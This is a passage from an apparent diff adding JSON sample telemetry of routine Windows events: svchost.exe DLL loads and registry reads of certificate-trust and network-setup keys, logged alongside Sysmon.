"C:\\Windows\\System32\\powrprof.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "NetSetupApi.dll", + "image_path": 
"C:\\Windows\\System32\\NetSetupApi.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793860000, + "unique_pid": 
"{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793860000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"image_load", + "image_name": "NetSetupSvc.dll", + "image_path": "C:\\Windows\\System32\\NetSetupSvc.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\State", + "registry_value": "State", + "timestamp": 131883573794180000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "NetSetupEngine.dll", + "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794180000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794180000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794180000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System", + "registry_path": "HKLM\\System\\CurrentControlSet", + "registry_value": "CurrentControlSet", + "timestamp": 131883573794180000, + 
"unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System", + "registry_path": "HKLM\\System\\CurrentControlSet", + "registry_value": "CurrentControlSet", + "timestamp": 131883573794180000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\Interfaces", + "registry_value": "Interfaces", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", + "registry_value": "0001", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": 
"HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", + "registry_value": "0001", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", + "registry_value": "0000", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", + "registry_value": "0000", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", + "registry_value": "0001", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": 
"HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", + "registry_value": "0000", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "ImplatSetup.dll", + "image_path": "C:\\Windows\\System32\\ImplatSetup.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "NetSetupEngine.dll", + "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System", + "registry_path": "HKLM\\System\\CurrentControlSet", + "registry_value": "CurrentControlSet", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + 
"event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System", + "registry_path": "HKLM\\System\\CurrentControlSet", + "registry_value": "CurrentControlSet", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "ImplatSetup.dll", + "image_path": "C:\\Windows\\System32\\ImplatSetup.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\Interfaces", + "registry_value": "Interfaces", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 
2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
